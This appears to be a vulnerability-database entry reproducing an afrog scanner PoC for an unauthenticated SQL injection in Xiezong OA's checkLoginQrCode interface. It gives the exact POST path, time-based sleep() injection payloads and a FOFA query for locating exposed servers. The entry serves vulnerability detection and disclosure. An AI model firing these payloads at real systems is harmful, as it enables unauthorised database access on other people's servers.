cnoa-checkLoginQrCode-sqli: 协众 OA checkLoginQrCode SQL Injection

日期: 2025-09-01 | 影响软件: 协众OA | POC: 已公开

漏洞描述

Xiezong OA system has a SQL injection vulnerability in the checkLoginQrCode interface. Unauthenticated attackers can exploit this vulnerability to extract information from the database. FOFA: app="协众软件-协众OA"

PoC代码[已公开]

id: cnoa-checkLoginQrCode-sqli
info:
  name: 协众 OA checkLoginQrCode SQL Injection
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    Xiezong OA system has a SQL injection vulnerability in the checkLoginQrCode interface.
    Unauthenticated attackers can exploit this vulnerability to extract information from the database.
    FOFA: app="协众软件-协众OA"
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%8D%8F%E4%BC%97OA/%E5%8D%8F%E4%BC%97OA%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3checkLoginQrCode%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.md
  tags: cnoa,sqli
  created: 2024/12/31

rules:
  r0:
    request:
      method: POST
      path: /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode
      body: id=(select * from (select sleep(10))z)
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"failure":true') &&
      response.latency <= 12000 &&  
      response.latency >= 10000
  r1:
    request:
      method: POST
      path: /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode
      body: id=(select * from (select sleep(6))z)
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"failure":true') &&
      response.latency <= 8000 &&  
      response.latency >= 6000
  r2:
    request:
      method: POST
      path: /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode
      body: id=(select * from (select sleep(10))z)
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"failure":true') &&
      response.latency <= 12000 &&  
      response.latency >= 10000
  r3:
    request:
      method: POST
      path: /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode
      body: id=(select * from (select sleep(6))z)
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"failure":true') &&
      response.latency <= 8000 &&  
      response.latency >= 6000
expression: r0() && r1() && r2() && r3()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/cnoa-checkLoginQrCode-sqli.yaml

相关漏洞推荐